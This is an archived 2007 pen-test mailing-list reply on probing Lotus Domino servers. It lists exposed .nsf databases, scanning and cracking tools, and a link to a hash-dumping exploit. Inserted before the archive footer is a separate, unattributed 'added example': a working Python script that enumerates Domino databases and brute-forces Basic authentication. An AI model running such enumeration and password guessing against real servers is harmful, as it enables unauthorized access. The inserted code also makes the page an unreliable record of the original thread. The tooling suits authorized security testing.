Re: Domino testing

From: Marco Ivaldi (raptor@mediaservice.net)
Date: Mon Jul 23 2007 - 09:21:55 EDT


Hey,

On Fri, 20 Jul 2007, A Plasmoid wrote:

> I'm new to Domino testing, and have found a few interesting databases.
> I am wondering if there is anything that could be done with
> them. Specifically, there are:
>
> cldbdir.nsf

This is the Cluster Directory: obvious information leak.

> dba4.nsf

Beside the obvious information leak due to unrestricted access to the
Database Analysis feature itself, there seems to be a file disclosure
vulnerability affecting dba4.nsf, though I've not been able to find more
details (see http://www.eeye.com/html/Products/Retina/RTHs/Web_Servers/).

You may try to check IBM's changelog and fix lists for anything mentioning
a security vulnerability on dba4.nsf.

> qstart.nsf

Quick Start: I don't see any immediate security implications, but the
golden rule of "disable all unused/unneeded stuff" should be applied.

> /sample/faqw46.nsf
> /sample/pagesw46.nsf (several others in sample)
> /help/help5_designer.nsf (several others in help)

See above.

> The ?EditDocument functionality is locked down with "basic
> authentication" but I can view them. There is not a lot of info (that I
> have found) regarding domino, so I'm hoping that some kind person here
> can tell me whether these things can be leveraged into a deeper level of
> access or not.

Here are some interesting resources about Lotus Domino/Notes security that
may help in your task:

http://www.dominosecurity.org/
http://www.ngssoftware.com/papers/hpldws.pdf
http://www.fortconsult.net/images/pdf/lotusnotes_keyfiles.pdf
http://seclists.org/pen-test/2002/Nov/0034.html (all thread)
http://documents.iss.net/whitepapers/domino.pdf
http://www-128.ibm.com/developerworks/views/lotus/library.jsp
http://www-128.ibm.com/developerworks/lotus/security/
http://www.redbooks.ibm.com/redbooks/pdfs/sg247017.pdf
http://www.redbooks.ibm.com/pubs/pdfs/redbooks/sg245341.pdf

And some testing tools:

http://packetstormsecurity.org/UNIX/scanners/DominoHunter-0.92.zip
http://packetstormsecurity.org/UNIX/scanners/domino.tar.gz
http://www.cqure.net/wp/?page_id=17
http://www.appsecinc.com/products/appdetective/domino/ (commercial!)
http://www.rapid7.com/nexpose/features.jsp (commercial!)
http://www.openwall.com/john
http://usuarios.lycos.es/reinob/
http://www.nestonline.com/lcrack/
http://www.securiteinfo.com/download/dhb.zip
http://www.cqure.net/wp/?page_id=12
Other commercial password crackers from Elcomsoft/Passware/etc.

> All of the other "important" databases like names.nsf, webadmin.nsf, and
> others are also protected with basic auth.

If compatible with scope and legal agreement, you should try to brute
force the Basic Authentication to get access to the protected databases
and functionalities. Some manual password guessing also doesn't hurt ;)

If you're ultimately able to get access to names.nsf, you may use my
CVE-2005-2428 exploit to grab all password hashes:

http://www.0xdeadbeef.info/exploits/raptor_dominohash

> Thanks for any hints, clues, and even "Google is your friend" stuff (as
> long as there is a corresponding reasonable search parameter) :)

Hope this helps,

-- 
Marco Ivaldi, OPST
Chief Security Officer    Data Security Division
@ Mediaservice.net Srl    http://mediaservice.net/
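An added example (mine, not Marco's, IBM's or any tool from the list above) covering the two steps the reply describes: enumerate the well-known .nsf databases and classify how each one is protected, then, where Basic authentication guards a database and the engagement's scope allows it, run the password-guessing loop. The hostname argument, the candidate credentials, the `fake_fetch` stand-in server and the three extra standard database names (log.nsf, catalog.nsf, domcfg.nsf) are assumptions, not taken from the thread:

```python
#!/usr/bin/env python3
"""Survey a Lotus Domino HTTP server for well-known .nsf databases.

Added example for this thread (not code from the original post or from
IBM/Lotus): classify each database path as open, Basic-auth protected,
behind a Domino session-login form, forbidden or absent, then run a small
credential-guessing loop against the Basic-auth ones. The hostname,
candidate passwords and `fake_fetch` are constructed for illustration.
"""
import base64
import http.client
import sys

# Paths named in the thread plus three standard Domino databases
# (log.nsf, catalog.nsf, domcfg.nsf); what actually exists is server-specific.
KNOWN_DBS = [
    "/names.nsf", "/webadmin.nsf", "/cldbdir.nsf", "/dba4.nsf", "/qstart.nsf",
    "/sample/faqw46.nsf", "/sample/pagesw46.nsf", "/help/help5_designer.nsf",
    "/log.nsf", "/catalog.nsf", "/domcfg.nsf",
]


def classify(status, headers, body):
    """Map one HTTP response to a finding label (`headers` keys lower-cased).

    Domino configured for session authentication answers with an HTML login
    form (action ending in "?Login") and status 200 instead of a 401, so a
    200 only counts as "open" when no such form is present (heuristic).
    """
    if status == 200:
        return "session-login" if "?login" in body.lower() else "open"
    if status in (301, 302) and "?login" in headers.get("location", "").lower():
        return "session-login"
    if status == 401:
        www = headers.get("www-authenticate", "").lower()
        return "basic-auth" if www.startswith("basic") else "auth-other"
    return {403: "forbidden", 404: "absent"}.get(status, "other:%d" % status)


def survey(fetch, paths):
    """Probe each path; `fetch(path, headers)` returns (status, headers, body)."""
    return {p: classify(*fetch(p, {})) for p in paths}


def basic_header(user, password):
    """Build the Authorization header a browser sends for Basic auth."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": "Basic " + token}


def guess_basic(fetch, path, candidates):
    """Try (user, password) pairs in order and return the first one the server
    accepts (any status but 401) with that status, or None. Scope and lockout
    policies apply: run this only inside an agreed engagement."""
    for user, password in candidates:
        status, _, _ = fetch(path, basic_header(user, password))
        if status != 401:
            return (user, password, status)
    return None


def http_fetch(host, port=80, use_tls=False, timeout=10):
    """Return a real `fetch` callable bound to one server (hostname assumed)."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection

    def fetch(path, extra_headers):
        conn = conn_cls(host, port, timeout=timeout)
        try:
            conn.request("GET", path, headers=extra_headers)
            resp = conn.getresponse()
            body = resp.read(8192).decode("latin-1", "replace")
            return resp.status, {k.lower(): v for k, v in resp.getheaders()}, body
        finally:
            conn.close()
    return fetch


def fake_fetch(path, extra_headers):
    """Constructed stand-in for a Domino server so the script runs offline."""
    if path == "/names.nsf":
        if extra_headers.get("Authorization") == basic_header("admin", "admin")["Authorization"]:
            return 200, {}, "<html>Domino Directory</html>"
        return 401, {"www-authenticate": 'Basic realm="/names.nsf"'}, ""
    canned = {
        "/cldbdir.nsf": (200, {}, "<html>Cluster Directory</html>"),
        "/webadmin.nsf": (200, {}, '<form action="/names.nsf?Login" method="post">'),
        "/dba4.nsf": (403, {}, ""),
    }
    return canned.get(path, (404, {}, ""))


if __name__ == "__main__":
    fetch = http_fetch(sys.argv[1]) if len(sys.argv) > 1 else fake_fetch
    findings = survey(fetch, KNOWN_DBS)
    for path, finding in sorted(findings.items()):
        print(f"{finding:14} {path}")
    # Constructed candidate list; use a real wordlist in practice.
    for path in [p for p, f in findings.items() if f == "basic-auth"]:
        hit = guess_basic(fetch, path, [("admin", "password"), ("admin", "admin")])
        print(path, "no hit" if hit is None else "accepted %s:%s (HTTP %d)" % hit)
```

Run it with a hostname to probe a real server, or with no arguments to see the classification applied to the constructed responses. The "?Login" heuristic matters because a Domino server set up for session authentication hands back a login form with a 200 rather than a 401, which a naive status-code check would report as an open database; the Basic-auth realm in the 401 is also worth recording, since it usually names the database being protected.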


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:58 EDT